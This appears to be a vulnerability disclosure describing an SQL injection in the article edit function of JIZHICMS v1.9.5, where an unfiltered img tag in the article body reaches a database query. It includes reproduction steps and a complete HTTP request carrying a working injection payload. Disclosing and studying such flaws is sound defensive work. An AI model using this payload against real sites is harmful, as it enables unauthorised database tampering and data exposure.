SQL Injection vulnerability in JIZHICMS v1.9.5 via the add or edit article
On the article function side of JIZHICMS V1.9.5, when the picture is not set when the article is published, JIZHICMS will set the first img tag in the body as the article picture. In this acquisition process, the img tag parameters are not checked and filtered, so Caused SQL injection.
Recurring environment:
Open the article editing page to submit and then modify the data package
Modify the modified litpic and body to the following values respectively and then send
litpic=''
body=<img+src%3d"http%3a//a.com/a.jpg',+title+%3d+version()+,+orders+%3d+'1"/>
payload
POST /admin.php/Article/editarticle.html HTTP/1.1
Host: jizhicms.test
Content-Length: 237
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: <http://jizhicms.test>
Referer: <http://jizhicms.test/admin.php/Article/editarticle/id/33.html>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=pjhk5trh72fq0eeobrn81bmba4
Connection: close
go=1&id=33&title=test&tid=2&seo_title=test&hits=0&keywords=&litpic=&file=&description=&orders=0&tags=&isshow=1&addtime=2021-06-27+22%3A14%3A16&target=&ownurl=&body=<img+src%3d"http%3a//a.com/a.jpg',+title+%3d+version()+,+orders+%3d+'1"/>